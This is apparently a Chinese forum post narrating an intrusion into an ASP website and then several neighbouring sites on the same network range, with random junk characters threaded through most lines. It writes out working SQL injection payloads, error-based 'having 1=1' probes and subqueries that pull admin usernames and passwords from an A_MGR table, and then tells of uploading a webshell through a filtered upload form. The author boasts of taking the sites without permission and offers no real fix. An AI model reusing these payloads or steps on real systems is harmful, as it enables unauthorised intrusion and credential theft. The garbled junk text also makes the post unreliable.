发现一个注入点 o+ w: o; N8 v) \3 ~$ ~; g5 w; F& N
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389, d* z5 ]# h- v
1 T- a0 z! E2 u; d E! O: V- _习惯性的加’having1=1--" m& T9 I# A5 X
3 f* ^* F2 W' l! E/ Q1 g% T
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
) l, s7 V N* Y2 s- J6 [. |: a. n0 a# L5 U
0
; z; O K9 b; J5 g6 P# [4 L" a' [* I
爆出Diary_A.dl_Title(这时候很激动啊)1 U* t9 U, e+ [7 B/ E) e9 V
# _+ p3 Z* g( K0 d那么继续
$ @' b5 ~ i* S# T( D" [, hhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—- Q6 o/ m) X5 B" n" r9 Q
, [4 X! J: v. X3 k! O T继续,一直爆下去
+ }( l2 h: R# I& U) p9 k- n' w% [8 F0 g/ \
爆到几个字段和表段 但是没找到需要的管理用户的字段
3 Z! t% s, S' r P. J% T# }$ y0 H: z) X7 H2 P( s/ t; p/ E
蛋疼了 怎么办 然后去后台登陆页看源码
, E7 g$ x+ }; ^) A) r3 B( h' K; V& U0 z) B, s" r5 P
0
2 z9 q5 U: d- J* b. O. x8 O+ o6 I% m; F6 e! E+ ^
Input name= “ADUID”" U8 v q0 v1 ~, g. F( f Z
Input name= “ADPWD”4 ?0 u" J- U8 C3 _$ k
4 D+ C. P/ G+ m! F
很幸运 找到了字段那就继续8 X9 ^6 u5 O: m
找到之后开始爆用户
% n% l4 K* f* j* }http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—) H" G* m4 t4 R& z) D$ ]# t
爆密码
" g8 S6 k) O7 w& Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
$ ~3 ^( S2 G+ @: U测试了下 这个注入点只能爆到文章哪里的表 " k. O; b. C4 U g5 h
1 j; u- z: \% _9 f% q. H头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了$ L$ j' F: Y! k( S
) d" m4 R. Q3 ?; F又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了' m% l0 s( I6 F7 c( L- d# O% A
9 p2 E# i; V& b3 H/ w2 y
473
' N& F# [2 D' q! C# _
2 |2 |' B# ?) a5 X4 q& Y3 F进后台* O% E# l3 h5 l; ^
& {8 g2 k) a; k Q% ^
5 r, o: l1 r5 E
发现几个上传点 有的地方不能上传 而且防止恶意代码1 P, o) |) g |& a
2 c5 d/ v* y: k; x% E* T
没办法 各种百度各种找大牛 找到一只好像可以突破的马
( \, P v1 |8 ?5 j2 n% l& \- B0 N# ]- U& G
2 X( k! K0 {' {7 w( c# E' p
在系统管理那里直接上传 不过没有显示地址
% D/ T0 t# u* }. c+ H8 ?- V7 e/ @% U, a% f( y8 v, X
再上传一次 抓包 搞定OK( z5 J% W2 y5 x. ^6 N
1 _3 y) s) j$ n/ z/ ~3 [4 \
2 J% a$ h6 _8 ~
- S: A& |: j: U) p472
7 J6 c' T+ I( ^0 p! o: ^ s9 ~( L
) p V2 u1 V1 H3 F. `0 [5 f晚上不行了 去睡觉。。。4 k3 f" S" A5 G5 s. z' K- [
第二天刚起床 闲的没事做继续日站吧
+ ~% m" h F$ P) m) h* F% d; K* {6 S: e( ]7 w
找个站 就把这个站的旁c扫了下* ~$ u2 x4 K% \$ y3 |
% Y* H7 C6 y4 O; Q发现c段也有一个购物站 ,然后还和这个站的模板差不多
! b/ g; @8 _- P9 @* G& M8 m/ ]& D/ M) S5 A# z5 ]4 ~) G5 F
就找到会员登录口测试
" D% h- L4 ]* |* V" [
: ]5 u0 N( r c' L. F( c5 G: q'and (select top 1 MGR_UID from A_MGR)>0—
& k6 B. ^- W6 _- X, ~果断爆到了 这时候我很激动 通杀0 x" E# C$ [! f; J7 G4 @: L
5 _: m; v) N2 s+ T }% j
再次翻c段
! g6 C% `- z; E1 R3 C. a, t6 v2 s
$ U _7 H; Q" \: \翻出几个站 都成功拿下( T- Y2 |7 P" |6 F
# a6 F$ u' L( l: _! ]7 @2 Z; A/ Y8 I! U) s5 v, O: j
' q- w1 P/ n4 C$ @7 X! a
修复方案:: }( ?- c. W0 W8 C- L7 q5 ]7 ?1 O
他们比我专业
- {! ]) y6 d- ?
! M# j1 z( g s" @$ G1 @7 m/ d
! ?7 G/ q. n! V4 w' D$ v" H7 N3 F+ T1 n$ e% |1 z# a
|